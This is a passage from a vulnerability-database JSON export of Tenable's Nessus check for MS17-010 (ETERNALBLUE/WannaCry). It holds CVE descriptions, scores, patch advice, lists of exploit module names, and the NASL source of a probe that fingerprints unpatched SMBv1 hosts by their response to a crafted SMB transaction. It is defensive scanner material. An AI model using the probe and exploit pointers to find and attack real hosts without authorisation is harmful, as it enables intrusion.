"description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2020-10-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?8dcab5e4", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?68fc8eff", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.nessus.org/u?4c7e0cf3", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?b9d9ebf9", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?59db5b5b", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.nessus.org/u?065561d0", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.nessus.org/u?234f8ef8"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-06T03:05:32", "history": [], "viewCount": 7176, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-06T03:05:32", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2021-10-06T03:05:32", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft recommends that users discontinue the use of SMBv1. SMBv1 lacks security features that were included in later SMB versions. SMBv1 can be disabled by following the vendor instructions provided in Microsoft KB2696547. Additionally, US-CERT recommends that users block SMB directly by blocking TCP port 445 on all network boundary devices. For SMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137 / 138 on all network boundary devices.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-10-06T03:05:32", "differentElements": ["vpr"], "edition": 10}, {"bulletin": {"id": "MS17-010.NASL", "hash": "c5c146b305e2f4b1abd96ec9c5d3d69f", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2020-10-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?68fc8eff", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?234f8ef8", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?4c7e0cf3", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://www.nessus.org/u?065561d0", "https://github.com/stamparm/EternalRocks/", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "http://www.nessus.org/u?b9d9ebf9", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?8dcab5e4", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-12T14:06:24", "history": [], "viewCount": 7179, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96705", "SMNTC-96706", "SMNTC-96704", "SMNTC-96709", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": 